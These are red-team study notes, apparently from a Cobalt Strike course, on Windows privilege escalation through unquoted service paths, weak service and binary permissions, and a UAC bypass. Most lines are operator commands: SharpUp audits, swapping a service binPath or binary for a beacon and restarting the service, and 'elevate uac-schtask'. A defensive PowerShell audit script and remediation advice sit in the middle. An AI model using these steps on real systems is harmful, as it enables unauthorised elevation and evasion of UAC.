In keeping with the principle of least privilege, privilege escalation should only be sought if it provides a means of reaching your goal, not something you do “just because”. Exploiting a privilege escalation vulnerability gives defenders additional data points with which to detect your presence. It is a risk-versus-reward calculation that you must make.
- tooling: SharpUp
potential vectors
services
- enumerate with: services.msc, sc query, Get-Service | fl
- Properties to check:
- Binary Path
- Startup Type, preferably automatic
- Service Status
- Log On As (can be domain or local account)
unquoted service paths
- run wmic service get name,pathname
- powershell Get-Acl -Path "C:\Program Files\Vulnerable Services" | fl
- execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit UnquotedServicePath
- beacons to use: service binaries, -svc in the payload filename
- upload
- rename to path part
- sc stop service
- sc start service
- connect to beacon
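The same unquoted-path check from the auditing side, as an added example that is not part of the original notes: it lists every service whose image path is unquoted and contains spaces, works out which directories the service control manager probes before the real binary, and flags those writable by low-privileged groups. It assumes an elevated PowerShell on the host being audited and that the `$lowPrivGroups` list is the set of identities to treat as low privileged.

```powershell
# Added audit example (not from the original notes). Assumptions: run elevated
# on the audited host; $lowPrivGroups is the list of identities considered
# low privileged for the purpose of the report.
$lowPrivGroups = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
$writeMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl)

# True when a low-privileged group holds any write-class right on $Path.
function Test-LowPrivWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            ($lowPrivGroups -contains $ace.IdentityReference.Value) -and
            (([int]$ace.FileSystemRights -band $writeMask) -ne 0)) {
            return $true
        }
    }
    return $false
}

# For an unquoted image path, return the directories the service control
# manager will probe before the real one (one candidate per space in the path).
function Get-SearchDirs {
    param([string]$ImagePath)
    $exe = [regex]::Match($ImagePath, '^.*?\.exe', 'IgnoreCase').Value
    if (-not $exe) { $exe = $ImagePath }   # no .exe suffix: use the whole string
    $parts = $exe -split ' '
    $dirs = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $dirs += Split-Path -Parent ($parts[0..($i - 1)] -join ' ')
    }
    return $dirs | Sort-Object -Unique
}

Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $path = $_.PathName
    # Quoted paths and paths without spaces are not affected; skip them.
    if ([string]::IsNullOrEmpty($path) -or $path.StartsWith('"') -or ($path -notmatch ' ')) { return }
    $writable = Get-SearchDirs $path | Where-Object { Test-LowPrivWritable $_ }
    [pscustomobject]@{
        Service            = $_.Name
        StartMode          = $_.StartMode
        RunsAs             = $_.StartName
        PathName           = $path
        WritableSearchDirs = ($writable -join '; ')
    }
} | Format-List
```

Any service reported with a non-empty WritableSearchDirs should have its image path quoted (sc config <name> binPath= "\"C:\full path\service.exe\"") and the directory ACL tightened so that only administrators can write to it.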
weak service permissions
- beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices
- PS> import c:\tools\Get-ServiceAcl.ps1
- PS> Get-ServiceAcl -Name VulnService | select -expand Access
- ChangeConfig, Stop, Start would be great
- > run sc config VulnService2 binPath= c:\badfile
- > run sc qc VulnService2
- > run sc stop VulnService2
- > run sc start VulnService2
weak service binary permissions
- binary itself can be overwritten
- beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Services\Service 3.exe" | fl
- sc stop service
- copy binary over the service
- sc start service
UAC bypass
- whoami /groups → medium mandatory level → UAC problem
- Elevate Kit (this is preloaded into Cobalt Strike and can be called through elevate)
- > elevate uac-schtask tcp-local